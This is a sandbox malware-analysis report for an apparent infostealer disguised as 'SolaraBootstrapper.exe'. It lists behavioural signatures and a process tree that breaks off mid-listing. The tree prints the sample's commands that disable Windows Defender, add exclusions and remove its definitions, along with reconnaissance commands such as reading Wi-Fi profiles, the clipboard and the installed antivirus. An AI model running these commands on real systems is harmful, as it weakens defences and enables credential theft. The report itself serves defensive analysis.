Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24/06/2024, 08:19

Errors

Reason
Machine shutdown

General

  • Target

    SolaraBootstrapper.exe

  • Size

    9.3MB

  • MD5

    a3a0a74ae9deaca4f0b17ff3b786a69d

  • SHA1

    49d033bdd1f2778a25decd8ec56b4a09082b05ad

  • SHA256

    ebdfc91afede21255f0a280514ef45f4335fac94f8b77562af3512fb01f83b68

  • SHA512

    c0b3cc5c12d20fef209bc2d838137cf7ac3eb9530738a8430f13f26b776ef8347fdaf9d00469bd82cf5e84d6eaf21a8ef2e2abd403f8708bb6ee172388cf743f

  • SSDEEP

    196608:Aqw6WBeyrZJvSzhEz2T2cU7Lu4MoXZZe5BvqBbq5jUx5ePz0+pgapx:UahMW+XRXZZKBGWoiFO6x

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 35 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 45 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Blocklisted process makes network request 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 25 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 14 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 30 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2264
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SolaraBootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\SolaraBootstrapper.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Windows\SysWOW64\msiexec.exe
        "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2340
      • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
        "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4300
        • C:\Windows\Temp\{FD70262F-C249-49C5-9DC8-0BF5C019B5C3}\.cr\vc_redist.x64.exe
          "C:\Windows\Temp\{FD70262F-C249-49C5-9DC8-0BF5C019B5C3}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=596 /install /quiet /norestart
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetWindowsHookEx
          PID:2344
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe
        3⤵
        • Enumerates system info in registry
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4676
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff4de73cb8,0x7fff4de73cc8,0x7fff4de73cd8
          4⤵
            PID:928
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1840,11558378942901212018,15885588225037780978,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1852 /prefetch:2
            4⤵
              PID:1444
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1840,11558378942901212018,15885588225037780978,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2732
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1840,11558378942901212018,15885588225037780978,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2568 /prefetch:8
              4⤵
                PID:2480
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,11558378942901212018,15885588225037780978,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                4⤵
                  PID:4580
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,11558378942901212018,15885588225037780978,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                  4⤵
                    PID:400
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1840,11558378942901212018,15885588225037780978,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3840 /prefetch:8
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3836
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,11558378942901212018,15885588225037780978,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
                    4⤵
                      PID:1356
                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1840,11558378942901212018,15885588225037780978,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:4576
                  • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
                    "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
                    3⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3948
                    • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=3948.484.8017734249098300018
                      4⤵
                      • Enumerates system info in registry
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of FindShellTrayWindow
                      PID:4892
                      • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x1cc,0x7fff4de73cb8,0x7fff4de73cc8,0x7fff4de73cd8
                        5⤵
                          PID:4448
                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1868,1289254005489661777,4428391111605483174,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
                          5⤵
                            PID:3484
                          • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                            "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,1289254005489661777,4428391111605483174,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2176 /prefetch:3
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2548
                          • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                            "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,1289254005489661777,4428391111605483174,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2704 /prefetch:8
                            5⤵
                              PID:3904
                            • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                              "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1868,1289254005489661777,4428391111605483174,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
                              5⤵
                                PID:5804
                              • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1868,1289254005489661777,4428391111605483174,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4588 /prefetch:8
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3068
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\svchost.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\svchost.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2964
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\svchost.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\svchost.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:3472
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\svchost.exe'"
                              4⤵
                                PID:3520
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\svchost.exe'
                                  5⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2884
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                4⤵
                                  PID:3964
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:460
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  4⤵
                                    PID:3744
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist /FO LIST
                                      5⤵
                                      • Enumerates processes with tasklist
                                      PID:1020
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                    4⤵
                                      PID:4184
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic csproduct get uuid
                                        5⤵
                                          PID:4060
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                        4⤵
                                          PID:3128
                                          • C:\Windows\system32\reg.exe
                                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                            5⤵
                                              PID:896
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                            4⤵
                                              PID:3108
                                              • C:\Windows\system32\reg.exe
                                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                5⤵
                                                  PID:1208
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                4⤵
                                                  PID:1052
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    5⤵
                                                    • Detects videocard installed
                                                    PID:3628
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  4⤵
                                                    PID:3048
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      5⤵
                                                      • Detects videocard installed
                                                      PID:3092
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
                                                    4⤵
                                                      PID:1780
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                                                        5⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1464
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      4⤵
                                                        PID:764
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist /FO LIST
                                                          5⤵
                                                          • Enumerates processes with tasklist
                                                          PID:580
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                        4⤵
                                                          PID:4244
                                                          • C:\Windows\system32\tasklist.exe
                                                            tasklist /FO LIST
                                                            5⤵
                                                            • Enumerates processes with tasklist
                                                            PID:4800
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                          4⤵
                                                            PID:4060
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                              5⤵
                                                                PID:1308
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                              4⤵
                                                                PID:2960
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-Clipboard
                                                                  5⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5356
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                4⤵
                                                                  PID:4760
                                                                  • C:\Windows\system32\tasklist.exe
                                                                    tasklist /FO LIST
                                                                    5⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:2912
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                  4⤵
                                                                    PID:2392
                                                                    • C:\Windows\system32\tree.com
                                                                      tree /A /F
                                                                      5⤵
                                                                        PID:5136
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                      4⤵
                                                                        PID:4596
                                                                        • C:\Windows\system32\netsh.exe
                                                                          netsh wlan show profile
                                                                          5⤵
                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                          PID:5216
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                        4⤵
                                                                          PID:5172
                                                                          • C:\Windows\system32\systeminfo.exe
                                                                            systeminfo
                                                                            5⤵
                                                                            • Gathers system information
                                                                            PID:5304
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                          4⤵
                                                                            PID:5204
                                                                            • C:\Windows\system32\reg.exe
                                                                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                              5⤵
                                                                                PID:5296
                                                                            • C:\Windows\system32\cmd.exe
